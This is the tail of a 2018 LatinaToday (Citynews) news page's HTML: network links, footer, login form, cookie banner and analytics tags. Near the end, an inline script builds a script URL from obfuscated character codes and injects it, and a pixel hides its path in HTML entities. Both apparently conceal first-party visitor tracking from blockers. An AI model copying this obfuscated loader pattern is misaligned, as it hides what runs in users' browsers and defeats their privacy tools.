 <li class="network-item"> <a tabindex="-1" href="http://www.foggiatoday.it/" title="cronaca Foggia"><b>Foggia</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.forlitoday.it/" title="cronaca Forli"><b>Forlì</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.frosinonetoday.it/" title="cronaca Frosinone"><b>Frosinone</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.genovatoday.it/" title="cronaca Genova"><b>Genova</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.lecceprima.it/" title="cronaca Lecce"><b>Lecce</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.latinatoday.it/" title="cronaca Latina"><b>Latina</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.leccotoday.it/" title="cronaca Lecco"><b>Lecco</b></a></li>   
 <li class="network-item"> <a tabindex="-1" href="http://www.milanotoday.it/" title="cronaca milano"><b>Milano</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.modenatoday.it/" title="cronaca Modena"><b>Modena</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.monzatoday.it/" title="cronaca Monza"><b>Monza</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.napolitoday.it/" title="cronaca Napoli"><b>Napoli</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.novaratoday.it/" title="cronaca novara"><b>Novara</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.padovaoggi.it/" title="cronaca Padova"><b>Padova</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.palermotoday.it/" title="cronaca Palermo"><b>Palermo</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.parmatoday.it/" title="cronaca Parma"><b>Parma</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.ilpescara.it/" title="cronaca Pescara"><b>Pescara</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.ilpiacenza.it/" title="cronaca Piacenza"><b>Piacenza</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.pisatoday.it/" title="cronaca Pisa"><b>Pisa</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.perugiatoday.it/" title="cronaca Perugia"><b>Perugia</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.ravennatoday.it/" title="cronaca Ravenna"><b>Ravenna</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.riminitoday.it/" title="cronaca Rimini"><b>Rimini</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.romatoday.it/" title="cronaca roma"><b>Roma</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.salernotoday.it/" title="cronaca Salerno"><b>Salerno</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.sondriotoday.it/" title="cronaca Sondrio"><b>Sondrio</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.trevisotoday.it/" title="cronaca Treviso"><b>Treviso</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.trentotoday.it/" title="cronaca Trento"><b>Trento</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.triesteprima.it/" title="cronaca Trieste"><b>Trieste</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.torinotoday.it/" title="cronaca Torino"><b>Torino</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.udinetoday.it/" title="cronaca Udine"><b>Udine</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.veneziatoday.it/" title="cronaca venezia e mestre"><b>Venezia</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.veronasera.it/" title="cronaca verona"><b>Verona</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.vicenzatoday.it/" title="cronaca Vicenza"><b>Vicenza</b></a></li>
 
<li role="separator" class="divider"></li>  
 <li class="network-item"> <a tabindex="-1" href="http://europa.today.it/" title="news Europa"><b>EuropaToday</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.sportpiacenza.it/" title="sport Piacenza"><b>SportPiacenza</b></a></li>
 <li class="network-item"> <a tabindex="-1" href="http://www.romagnaoggi.it/" title="cronaca Romagna"><b>RomagnaOggi</b></a></li>


<li role="separator" class="divider"></li>   
 <li class="size1of1">
  <a href="http://www.today.it" tabindex="-1">
   <img src="http://3.citynews.stgy.ovh/~shared/images/v2015/today-logo.png" alt="Today">
      <p class="text-sm"><em>Il meglio delle notizie dall'italia e dal mondo</em></p>
  </a>
 </li>

 <li role="separator" class="divider"></li>   
 <li class="size1of1">
     <a href="http://www.citynews.it" tabindex="-1">
       <img src="http://3.citynews.stgy.ovh/~shared/images/brand/citynews/cn-horizontal-full.png" style="height: 28px" alt="">
      <p class="text-sm"><em>Leader nell'informazione di prossimità</em></p>
     </a>
 </li>        </ul>
      </div>
      <ul class="u-unstyled inline-list list-link visible-md visible-lg">
        <li><a class="link" href="http://www.citynews.it/azienda/" rel="nofollow">Chi siamo <span class="middot">·</span></a></li>
        <li><a class="link" href="http://www.citynews.it/azienda/comunicati/" rel="nofollow">Press <span class="middot">·</span></a></li>
        <li><a class="link"href="http://www.citynews.it/azienda/contatti/" rel="nofollow">Contatti</a></li>
      </ul>
      <p class="footer-copy">
                
        © Copyright 2010-2018 - LatinaToday supplemento al plurisettimanale telematico RomaToday reg. tribunale di Roma n. 93/2010
        P.iva 10786801000
        
                       
        

        
        
      </p>
    </div>
  </div>   
  
</footer>    </div>

    
    
<script type="text/javascript">/*<![CDATA[*/window.ReviveAD_SPC&&ReviveAD_SPC();/*]]>*/</script>
<script type="text/javascript">/*<![CDATA[*/window.asyncHTML&&asyncHTML.ready();/*]]>*/</script>




<div id="svg_icons"></div>

  <div id="app_async" style="position:fixed;bottom:0;right:0;z-index:9999999;padding:2px 10px;background:#333;color:#f0f0f0;opacity:0.75;text-align:right;border-top-left-radius:5px;pointer-events:none;">
    <b>LatinaToday</b> è in caricamento<noscript>, ma ha bisogno di JavaScript</noscript>
  </div>

<script type="text/javascript">/*<![CDATA[*/

  window.al && al
  ( 
    "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/polyfill\/picturefill.js",
   
    function()
    {
      setInterval( function()
      {
        window.picturefill && picturefill( );
      }, 3000 ); 
    }
  );
  
  
  
  window.dl && dl
  ( 
    "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
      
    function()
    {
      if ( !window.$ )
        return;
      
      $('#svg_icons').load( "http:\/\/3.citynews.stgy.ovh\/~shared\/images\/v2015\/icons\/all-icons.svg" );
    }
  );
  
  
    window.dl && dl
  ( 
    [
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
      "http:\/\/1.citynews-latinatoday.stgy.ovh\/scripts\/Category\/v2015_js.js"    ],
    
    function( )
    {
      if ( !window.$ )
        return;
      
      
      if ( !document.readyState || document.readyState == 'complete' || document.readyState == 'loaded' )
        $('#app_async').fadeOut( 'fast', function(){ $(this).hide(); } );
      
      else
      {
        $(window).on( 'load', function()
        {
          $('#app_async').fadeOut( 'fast', function(){ $(this).hide(); } );
        }); 
      }
      
      
      $(window).on( 'beforeunload unload', function()
      {
        $('#app_async').fadeIn( 'fast' );
      }); 
    }
  );
   
   
  window.dl && dl
  ( 
    [ 
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js", 
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/jquery\/jquery.copypaste.js"    ], 
    
    function( )
    {
      window.$ && $.copypaste && $.copypaste('%hide-start%<b>%title%</b><br />\n\x26bdquo;%hide-end%%copy%%hide-start%\x26ldquo;<br />\n<br />\n<address>Potrebbe interessarti: <a href="%url%">%url%</a><br />\nSeguici su Facebook: <a href="https:\/\/www.facebook.com\/pages\/LatinaToday\/128888647217934">https:\/\/www.facebook.com\/pages\/LatinaToday\/128888647217934</a></address>%hide-end%%ctrl-c%');
    }
  );
  
  
  window.dl && dl
  ( 
    [ 
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js", 
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/jquery\/jquery.object-fit.js?v=1.1"    ]
  );

/*]]>*/</script>






  <script type="text/javascript">/*<![CDATA[*/
  
    (function()
    {
      if ( !document.querySelectorAll || !document.querySelectorAll('.fancybox').length )
        return;
      
      window.dl && dl
      (
        [ 
          "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
          "http:\/\/2.citynews.stgy.ovh\/~shared\/scripts\/fancybox\/jquery.fancybox.pack.js"        ], 
        
        function( )
        {
          if ( !window.$ || !$.fn.fancybox )
            return;
          
          $( '<link />',
           {
             rel:  'stylesheet',
             type: 'text/css',
             href: "http:\/\/2.citynews.stgy.ovh\/~shared\/scripts\/fancybox\/jquery.fancybox.css"           }).appendTo( 'head' );
          
          
          $(function()
          { 
            $('.fancybox').fancybox( );
          });
        }
      );
    }
   )();
   
  /*]]>*/</script>










<style type="text/css" media="all">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</style><style type="text/css" media="print">/*<![CDATA[*/@page {margin:2cm}*{position:static;flot:none;clear:both}h1, h2, h3, h4, .datestamp {font-family:Helvetica, Arial, sans-serif !important}body{background-color:#ffffff;color:#000000}p, .entry-content-body > p{font-family:"Times New Roman", Georgia, serif}h1{font-size:24pt;line-height:120%;margin:0;margin-bottom:8pt}h2, h3, h4{font-size:12pt !important;page-break-after:avoid}h5{border-bottom:1px solid #e0e0e0;padding-bottom:4pt}.datestamp{font-size:10pt}ul{list-style:none;padding:0;margin:0}a{text-decoration:none;color:#000000}a[href]:after{display:none}nav,aside,.start-search,.network,.header-bottom,.nav-toolbar,.nav-btn,img,.photo-gallery-preview,.content-secondary-column,.icon,.entry-labels,.entry-meta .meta-byline .author .author-photo,.entry-meta .meta-byline .author .author-photo,.entry-meta .meta-social,.related-stories,.entry-footer,.discussion-section,.top-stories,.back-to-top-link,footer,.preview-gallery-heading,.event-entry > p,.fancybox,.page-title,.rating,.label,.slot-980x30_home,.slot-980x30,.timestamp,.filters-dropdown,.aside-filters,.dropdown,.events-search,.follow-btn,.slots,.video-box,iframe,iframe[style],.skin_top,.skin_left,.skin_right,.default-pagination,.caption,.module-no-border,.ob-widget{display:none !important}.wrapper{margin-top:0 !important}.header-logo{width:100%;float:left;display:block}.entry{border-bottom:0}.entry-media:first-child, .entry-media:first-child a.fancybox, .entry-media:first-child img {display:block !important}.entry-media:first-child img{width:60% !important}.logo{width:350px}.theme-header .logo-edition{fill:#3b3b3b}.header .theme-header,.main-content,.main-content .entry,.main-content .entry .entry-header,.entry-map,.entry-map .map-address,.unit, .line{padding:0;margin:0}.entry-summary{font-size:14pt;line-height:18pt;margin:0;margin-bottom:4pt } .entry-content-body blockquote { margin:0;margin-bottom:4pt}.entry-content-body p, .entry-content-body blockquote p{font-size:10pt;line-height:14pt;margin:0;margin-bottom:8pt;padding:0}.card-heading, .story-summary{padding-bottom:8pt;border-bottom:1px solid #e0e0e0}.content-main-column{width:100% } .has-author{ border: 0}/*]]>*/</style>

    
    
<div class="modal modal-sm fade" id="login_box" tabindex="-1" role="dialog" aria-labelledby="login_box" style="display:none;">
 <div class="modal-dialog" role="document">
  <div class="modal-content">
   <div class="modal-header">
    <button type="button" class="btn close-btn" data-dismiss="modal" aria-label="Close">
     <svg class="icon close-icon medium"><use xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#close-icon"></use></svg>
    </button>
    <h3 class="modal-title" id="myModalLabel">Effettua l'accesso</h3>
     <p id="login_box_message"></p>
   </div>

   <div class="modal-body">

        <div class="facebook-connect-wrapper">
          <div class="btn btn-lg btn-block facebook-connect-btn">
            <svg class="icon inverse-icon medium"><use xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#facebook-icon"></use></svg>
            Connettiti con Facebook

            
  <iframe class="facebook-connect-iframe" src="about:blank" data-src="http://www.citynews.it/signup/facebook/?iframe=1&token=jOnOlJx2i4y5U_EPLYKOljuuF8JdcqUx56Y7bOi6vZpnOBTcOQWB21O9BWwIe6wcBl5mz2v2s8KaFGfH1GbpphZvjsTbkJcEw1hERmXhMF2HrU4SQw0EiYjyR_eOYcyB1ImYcjVrkJ7YPFKzzrGJrqGHmXebm5rgoqazJu71rVZ7RosK6vyRD2FC4Rrpz9xrtbcUaZeyupxKlFAmUNdwJoBDmghWOHDbZkS4VyDdNYYxF-nh8cZ6ewKM3r5i0a3LgXRyiSL0LAGB4apIiTcU5KrEjhtfhnbu4HOOZwHo39ANL8rLwaf&__frame~t1OC0l=jjoXiHNA7nsiNOBrt9tCzlsijuej25" width="100%" height="100%" style="overflow:hidden;width:100%;height:100%;" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
          </div>
        </div>

    <hr>

    <p class="align-center">oppure usa il tuo account</p>
        <form class="form-signin" action="/user/login/" method="post" onsubmit="window.ga && ga( 'send', 'event', 'Community', 'Login', '' );">

     <div class="form-group">
      <input id="login_box_username" name="username" type="email" class="form-control" placeholder="e-mail">
     </div>

     <div class="form-group">
      <input name="password" type="password" class="form-control" placeholder="password">
     </div>


     <div class="form-group align-right">
      <a class="link text-sm" href="/user/reset/request/">Password dimenticata?</a>
     </div>
     <button type="submit" class="btn btn-lg btn-block default-btn">Accedi</button>
    </form>
   </div>
   <div class="modal-footer align-center">
    <span class="text-sm">Non sei registrato? <a class="btn btn-xs light-btn" href="/signup/register/">Crea un Account</a></span>
   </div>
  </div>
 </div>
</div>

<!--[if lte IE 9]><style type="text/css">.ie-alert {position: fixed;top: 0;background-color: white;width: 100%;height: 100%;z-index: 100;}.ie-alert .logo{margin: 32px 0;}.ie-alert .alert-content{width: 600px;margin: 160px auto 0;}.ie-alert .download-browser{margin: 8px;padding: 16px 8px;float: left;width: 30%;border: 1px solid #e0e0e0;}.ie-alert .browser-icon {margin:auto;display:block;}</style>
<div class="ie-alert align-center"><div class="alert-content"><div class="logo"><img src="http://3.citynews-latinatoday.stgy.ovh/images/v2015/brand/logo.png"></div><h1>La tua versione di Internet Explorer non è più supportata</h1><p>Per usufruire al meglio del nuovo sito <strong><a href="http://windows.microsoft.com/it-it/internet-explorer/download-ie" target="_blank">aggiorna il tuo browser</a></strong> all'ultima versione oppure prova uno dei seguenti browser:</p><ul class="u-unstyled inline-list"><li class="download-browser"><a href="https://www.google.it/chrome/browser/desktop/" rel="nofollow" target="_blank"><img src="http://2.citynews.stgy.ovh/~shared/images/v2015/icons/icon-chrome.png">Chrome</a></li><li class="download-browser"><a href="https://www.mozilla.org/it/firefox/new/" rel="nofollow" target="_blank"><img src="http://3.citynews.stgy.ovh/~shared/images/v2015/icons/icon-firefox.png">Firefox</a></li><li class="download-browser"><a href="http://www.opera.com/it/computer/windows" rel="nofollow" target="_blank"><img src="http://2.citynews.stgy.ovh/~shared/images/v2015/icons/icon-opera.png">Opera</a></li></ul></div></div>
<![endif]--><!--[if IE 7]><style type="text/css">.ie-alert .download-browser{margin:8px 4px;padding:16px 4px;}</style><![endif]-->
    

<script type="text/javascript">/*<![CDATA[*/

 (function( sName, sTitle )
 {
  if ( !window.localStorage || !window.JSON )
   return;
 
  var oZones = null;
 
  try
  {
   oZones = localStorage.getItem('__zones') || '';
   oZones = oZones ? JSON.parse(oZones) : {};
  }
  
  catch ( _ )
  {
   oZones = { };
  }
  
  
  if ( !(sName in oZones) )
  {
   oZones[sName] =
   {
    name:  sName,
    title: sTitle,
    hits:  0,
    last:  0
   };
  }
  
  with( oZones[sName] )
  {
   title = sTitle;
   hits  = Math.max( 0, hits+1 );
   last  = new Date().getTime( );
  }
  
  try
  {
   localStorage.setItem( '__zones', JSON.stringify(oZones) );
   return true;
  }
  
  catch ( _ )
  {
  }
  
  return false;

 })( "latina", "Latina" );

/*]]>*/</script>    

    

<style type="text/css">/*<![CDATA[*/
  .theeclbox{position: fixed; left: 0px; z-index: 9999999; height: auto; font-family: Helvetica,sans-serif; text-align: center; background: rgb(51, 51, 51) none repeat scroll 0px 0px; width: 100%; bottom: 0px; padding: 1rem;}
  .theeclbox_description{color: rgb(158, 158, 158); font-size: 0.75rem;margin-bottom: 1rem; display: block;}
  .theeclbox_info{display:none}
  .theeclbox_more{color: rgb(255, 255, 255); font-size: 0.75rem;}
  .theeclbox_accept{border-radius: 5px; border: 0px none; color: white; font-weight: bold; margin:0 auto; padding: 0.4rem 0.6rem 0.3rem; display:block;}
  @media (min-width: 46.25em) {
    .theeclbox_info{
      display:inline;
    }
    .theeclbox_accept, .theeclbox_description {display: inline}

  }
  @media (min-width: 62.5em) {
    .theeclbox_info{
      display:inline;
    }
    .theeclbox_accept, .theeclbox_description {display: inline}
  }
/*]]>*/</style>

<div id="theeclbox" style="display:none">

  <div class="theeclbox">
   <span class="theeclbox_description">
    <span class="theeclbox_info">Su questo sito utilizziamo cookie tecnici e cookie di profilazione, per migliorare i servizi e per pubblicità profilata.</span>
    Continuando la navigazione presti il consenso all'uso di tutti i cookie.
      
      <a onclick="window.open('//www.citynews.it/privacy#cookie', '_blank', 'width=550,height=600'); return false;" target="_blank" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#" class="theeclbox_more">Maggiori Informazioni</a>
    </span>
    <button id="theeclbox_accept" class="theeclbox_accept theme-background">OK</button>
  </div>

   
  <script type="text/javascript">/*<![CDATA[*/
  
    window.dl && dl
    (
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js" ,
      
      function( )
      {
        if ( !window.$ )
          return;
        
        if ( 'cookieEnabled' in navigator && !navigator.cookieEnabled )
          return;
        
        if ( (function(_){ return (_ = document.cookie.match(/\b__ecl=([^;]*)/i)) && parseInt(_[1]) ? true : false; })() )
          return;
        
        
        {
          var bAccepted = false;
          
          $(window).one('scroll', function()
          {
            if ( bAccepted )
              return;
            
            bAccepted = true;
            document.cookie = '__ecl=1; path=/; domain=.' + location.hostname.split('.').slice(-2).join('.') + '; max-age=' + 60*60*24*365 + '; expires=' + (new Date((new Date).getTime()+1E3*60*60*24*365)).toGMTString();
            $('#theeclbox').slideUp( );
          });
          
          
          $('#theeclbox_accept').click( function(event)
          {
            event.preventDefault();

            if ( bAccepted )
              return;
            
            bAccepted = true;
            document.cookie = '__ecl=1; path=/; domain=.' + location.hostname.split('.').slice(-2).join('.') + '; max-age=' + 60*60*24*365 + '; expires=' + (new Date((new Date).getTime()+1E3*60*60*24*365)).toGMTString();
            $('#theeclbox').slideUp( );
          });

          document.cookie = '__ecl=-1; path=/; domain=.' + location.hostname.split('.').slice(-2).join('.') + '; max-age=' + 60*60*24*7 + '; expires=' + (new Date((new Date).getTime()+1E3*60*60*24*7)).toGMTString();
          $('#theeclbox').slideDown( );
        }
      }
    );
   
  /*]]>*/</script>
  
</div>


<script type="text/javascript">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</script>


<script type="text/javascript">/*<![CDATA[*/(function(d,y,n,a,m,i,c,p,l,u,s){n=d.createElement(y);n.type=unescape(/text%2fjava/.source)+y;n.async=!0;n.src=(function(_){return(_=_[/fromCharCode/.source],_(4.7E+1,1.26E+2,1.15E+2,1.04e+2,9.7e+1,1.14E+2,0X65,0144,0X2f,0144,0x6f,47,126,4.7e+1,0143,0X6F,117,1.1e+2,0X74,0X2f,6.3e+1,1.06E+2,9.5e+1,0X78,064,060,4.8e+1,0102)+_(102,9.5E+1,0X62,1.11e+2,66,1.12e+2,1.21e+2,104,0112,0126,0x70,0152,5.3E+1,52,50,45,75,74,1.08e+2,87,122,104,8.2e+1,1.15e+2,105,87,7.4e+1,0X5a,0X4F,89,0162,9.8E+1,8.9E+1,0146,114,88,121,0153,121,0164)+_(0157,5.0E+1,98,9.7e+1,0X7A,4.9e+1,6.6E+1,0137,80,101,0X42,5.2e+1,0x7A,0x59,0x49,0162,0124,0X51,0X78,0x77,6.8E+1,0112,106,67,1.03E+2,78,0X62,0X6C,97)+_(062,0X61,8.3E+1,0x41,0X54,8.1e+1,9.5E+1,0x65,89,0x43,0107,57,0x49,5.7E+1,122,0x77,0x6f,86,7.2e+1,115,70,88,72,0103,85,0164,6.6e+1,8.2e+1,87,5.1E+1,0x58,0115,7.7e+1,0X50,5.3E+1,101,0X68,0x48,0x30,5.7E+1,0157)+_(107,4.8e+1,0x50,0X58,067,1.2e+2,5.5e+1,0x61,0102,0127,0x5F,5.5e+1,122,0106,0157,1.01E+2,0143,1.0E+2,98,78,100,0x56,1.11E+2,8.2E+1,0114,5.6e+1,0151,5.5e+1,6.5E+1,9.5E+1,0160,1.17e+2,1.02E+2,7.8e+1,76,8.4E+1,95,1.04e+2,0123,101,75))})(String);a=d.getElementsByTagName(y)[0];a.parentNode.insertBefore(n,a)})(document,/script/.source)/*]]>*/</script><noscript><img src="&#47;&#x7e;&#115;&#x68;&#97;&#x72;&#101;&#100;&#47;&#x64;&#111;&#47;&#x7e;&#x2F;&#x63;&#x6F;&#x75;&#110;&#x74;&#47;&#63;&#121;&#80;&#x74;&#x6C;&#67;&#x39;&#x4C;&#99;&#x70;&#x37;&#113;&#x31;&#x45;&#x42;&#x39;&#x73;&#71;&#x45;&#x55;&#x74;&#x49;&#x77;&#107;&#104;&#x56;&#107;&#65;&#x57;&#x4f;&#x52;&#83;&#89;&#103;&#x69;&#x63;&#49;&#57;&#x74;&#x78;&#x44;&#119;&#x61;&#x37;&#117;&#97;&#x42;&#x75;&#100;&#x64;&#x55;&#83;&#57;&#77;&#86;&#x67;&#x52;&#83;&#x58;&#x62;&#x63;&#x46;&#76;&#98;&#x77;&#54;&#x67;&#x55;&#98;&#x6d;&#121;&#45;&#x2D;&#x39;&#x30;&#x48;&#53;&#x6B;&#101;&#x47;&#119;&#54;&#70;&#x56;&#45;&#x65;&#x66;&#48;&#117;&#120;&#x32;&#49;&#x55;&#71;&#122;&#89;&#x66;&#x4B;&#x44;&#x38;&#x57;&#100;&#x6E;&#82;&#x53;&#x73;&#x30;&#x49;&#x76;&#75;&#x4E;&#x62;&#117;&#48;&#115;&#x70;&#89;&#x37;&#99;&#x4D;&#121;&#x30;&#x42;&#x71;&#84;&#66;&#77;&#x33;&#x6a;&#x79;&#x4f;&#65;&#84;&#x74;&#x66;&#x52;&#88;&#x4e;&#98;&#x54;&#x46;&#78;&#x77;&#x44;&#52;" width="1" height="1" border="0" alt="" style="position:absolute;left:-999999px;top:auto;width:1px;height:1px;overflow:hidden;clip:rect(0 0 0 0);clip:rect(0,0,0,0);" /></noscript>
<script type="text/javascript">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</script>


<script type="text/javascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter28177104 = new Ya.Metrika({id:28177104, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true, trackHash:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/3rdp-censor\/metrica.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks");</script><noscript><div><img src="//mc.yandex.ru/watch/28177104" style="position:absolute; left:-9999px;" alt="" /></div></noscript>



<!-- Begin comScore Tag -->
<script type="text/javascript">
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "9751734" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="http://b.scorecardresearch.com/p?c1=2&c2=9751734&cv=2.0&cj=1" width="1" height="1" alt="" />
</noscript>
<!-- End comScore Tag -->


<!-- START Nielsen Online SiteCensus V6.0 -->
<!-- COPYRIGHT 2012 Nielsen Online -->
<script type="text/javascript" src="//secure-it.imrworldwide.com/v60.js"></script>
<script type="text/javascript">
 var pvar = { cid: "citynews-it", content: "0", server: "secure-it" };
 var feat = { check_cookie: 0 };
 var trac = nol_t(pvar, feat);
 trac.record().post();
</script>
<noscript>
 <div>
 <img src="//secure-it.imrworldwide.com/cgi-bin/m?ci=citynews-it&amp;cg=0&amp;cc=0&amp;ts=noscript"
 width="1" height="1" alt="" />
 </div>
</noscript>
<!-- END Nielsen Online SiteCensus V6.0 -->  </body>

</html>